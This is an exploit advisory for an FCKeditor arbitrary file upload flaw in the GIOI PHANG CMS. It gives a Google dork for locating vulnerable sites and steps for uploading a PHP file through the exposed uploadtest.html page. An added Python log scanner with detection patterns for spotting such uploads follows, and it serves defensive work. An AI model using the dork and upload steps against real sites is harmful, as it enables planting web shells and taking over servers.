GIOI PHANG (fckeditor) Arbitrary File Upload Vulnerability

2015.12.15
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

########################################################################################
#
# Exploit Title : GIOI PHANG (fckeditor) Arbitrary File Upload Vulnerability
# Exploit Author : Linux Zone Research Team
# Vendor Homepage: http://tgp.vn
# Google Dork : intext:Powered (+) Designed THE GIOI PHANG Ltd.
# Date : 14-December-2015
# Tested On : Linux - Chrome
# MY HOME : http://linux-zone.org
#
###############################[ DESCRIPTION ]#####################################
#
# GIOI PHANG Arbitrary File Upload Vulnerability ..
# Vietnam Content Management System Site By tgp.vn
# Published By Linux Zone Research Team
#
###############################[ LOCATION + Exploit ]#############################
#
# exploit => /editor/filemanager/connectors/uploadtest.html
#
# first go to Target => http://site.com/
#
# Add exploit => http://www.site.com/editor/filemanager/connectors/uploadtest.html
#
# select => Select the "File Uploader"> php ... upload to : Uploaded File URL:
#
###################################################################################
#
# Hassan Shakeri - Mohammad Habili
#
# Twitter : @ShakeriHassan - Fb.com/General.BlackHat
###################################################################################
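
For site owners, the location given above translates directly into access-log indicators. The following is an added example, not part of the original advisory: it flags successful requests to the FCKeditor test pages, POSTs to the connector scripts, and requests for server-side scripts in the upload directory. The connector script names and the /userfiles/ upload directory are assumptions based on a stock FCKeditor 2.x layout, and the log lines are constructed.

```python
import re

# Combined-log-format fields we need: client, method, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# Test page named in the advisory, plus the test.html that ships beside it.
TEST_PAGE = re.compile(r'/editor/filemanager/connectors/(?:upload)?test\.html$', re.I)
# Assumptions (stock FCKeditor 2.x): connector script layout; uploads under /userfiles/.
UPLOAD_EP = re.compile(r'/editor/filemanager/connectors/\w+/(?:upload|connector)\.\w+$', re.I)
SCRIPT_IN_UPLOADS = re.compile(r'^/userfiles/.*\.(?:php\d?|phtml|asp|aspx|jsp)$', re.I)

def classify(line):
    """Return (client, finding, path) for a suspicious successful request, else None."""
    m = LOG_RE.match(line)
    if not m or not m.group(4).startswith('2'):
        return None
    client, method, target, _ = m.groups()
    path = target.split('?', 1)[0]          # ignore the query string
    if method == 'GET' and TEST_PAGE.search(path):
        return (client, 'test-page-exposed', path)
    if method == 'POST' and UPLOAD_EP.search(path):
        return (client, 'connector-upload', path)
    if SCRIPT_IN_UPLOADS.search(path):
        return (client, 'script-in-upload-dir', path)
    return None

def scan(lines):
    return [f for f in map(classify, lines) if f]

def upload_then_execute(findings):
    """Clients that posted to a connector and later requested a script in the upload dir."""
    uploaded, hits = set(), []
    for client, kind, path in findings:
        if kind == 'connector-upload':
            uploaded.add(client)
        elif kind == 'script-in-upload-dir' and client in uploaded:
            hits.append((client, path))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up file names).
TS = '[14/Dec/2015:10:00:00 +0700]'
SAMPLE = [
    f'198.51.100.7 - - {TS} "GET /editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 4312',
    f'198.51.100.7 - - {TS} "POST /editor/filemanager/connectors/php/upload.php?Type=File HTTP/1.1" 200 211',
    f'198.51.100.7 - - {TS} "GET /userfiles/file/a.php HTTP/1.1" 200 17',
    f'203.0.113.9 - - {TS} "GET /editor/filemanager/connectors/uploadtest.html HTTP/1.1" 404 162',
    f'203.0.113.20 - - {TS} "GET /userfiles/image/logo.png HTTP/1.1" 200 9001',
]
if __name__ == '__main__':
    print(scan(SAMPLE), upload_then_execute(scan(SAMPLE)))
```

Any test-page-exposed hit means the test page is reachable from outside and should be removed or access-restricted on the server.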

